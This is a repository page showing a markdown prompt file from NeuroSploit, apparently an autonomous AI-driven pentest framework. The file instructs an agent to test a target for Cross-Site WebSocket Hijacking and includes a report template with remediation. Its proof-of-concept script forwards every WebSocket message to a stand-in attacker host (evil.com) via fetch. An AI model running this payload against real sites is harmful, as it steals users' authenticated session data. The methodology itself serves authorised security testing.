CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-06-30 16:55:34 +02:00
Code Issues Packages Projects Releases Wiki Activity
Files
a5badefc2918fe259486d4828e057a746797cc2e
NeuroSploit/agents_md/vulns/websocket_hijacking.md
T
CyberSecurityUP 55af0d4634 NeuroSploit v3.3.0 — Autonomous MD-Agent Engine 
Re-model the pentest agent into an autonomous, markdown-driven engine that
turns a URL into a full engagement and delegates execution to a locally
installed agentic CLI backend.

Engine (neurosploit_agent/ + ./neurosploit launcher):
- orchestrator composes ONE master prompt from the agent library + RL weights
- backends: auto-detect & drive Claude Code / Codex / Grok CLI (+ Claude
  subscription); headless, autonomous, isolated workdir
- mcp: Playwright MCP (.mcp.json) for browser-based proof-of-execution
- rl: bounded per-agent reinforcement-learning weights w/ per-tech affinity,
  persisted to data/rl_state.json
- models: latest registry incl. NVIDIA NIM provider (PR #28)
- cli: interactive URL prompt + one-shot `run`, `backends`, `agents`, --dry-run

Agent library (agents_md/, 213 total):
- 196 vuln specialists incl. modern LLM/AI, cloud/K8s, API/auth, advanced
  injection, protocol smuggling, logic/crypto/supply-chain classes
- 17 meta-agents: orchestrator, recon, exploit_validator,
  false_positive_filter, severity_assessor, impact_evaluator, reporter,
  rl_feedback + migrated expert roles
- scripts/build_agents.py data-driven builder; REGISTRY.md index

Docs: rewritten README.md, v3.3.0 RELEASE.md, .env.example (NVIDIA NIM, xAI,
engine vars).

Retire legacy Python orchestration (neurosploit.py + agent classes) to legacy/.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-06-14 20:57:38 -03:00

44 lines
1.5 KiB
Markdown
Raw Blame History

# WebSocket Hijacking Specialist Agent
## User Prompt
You are testing **{target}** for Cross-Site WebSocket Hijacking (CSWSH).
**Recon Context:**
{recon_json}
**METHODOLOGY:**
### 1. Identify WebSocket Endpoints
- Look for `ws://` or `wss://` connections
- Common paths: `/ws`, `/socket`, `/websocket`, `/realtime`, `/cable`
- Check for Socket.IO: `/socket.io/?EIO=4&transport=websocket`
### 2. Test Origin Validation
- Connect from different origin (evil.com)
- Check if Origin header is validated during upgrade
- Try without Origin header
### 3. Test Authentication
- Connect without cookies/tokens
- Use expired session cookie
- Check if messages require per-message auth
### 4. Cross-Site WebSocket Hijacking PoC
```html
<script>
var ws = new WebSocket('wss://target.com/ws');
ws.onmessage = function(e) {
fetch('https://evil.com/log', {method:'POST', body:e.data});
};
ws.onopen = function() { ws.send('{"action":"get_profile"}'); };
</script>
```
### 5. Report
```
FINDING:
- Title: WebSocket Hijacking at [endpoint]
- Severity: High
- CWE: CWE-1385
- Endpoint: [ws URL]
- Origin Validated: [yes/no]
- Auth Required: [yes/no]
- Data Accessible: [what data]
- Impact: Real-time data theft, message injection
- Remediation: Validate Origin header, require auth per-connection
```
## System Prompt
You are a WebSocket Hijacking specialist. CSWSH is confirmed when a cross-origin page can establish a WebSocket connection and read/write data using the victim's session. The WebSocket must relay authenticated data. Public WebSockets with no auth data are not CSWSH targets.
Reference in New Issue View Git Blame Copy Permalink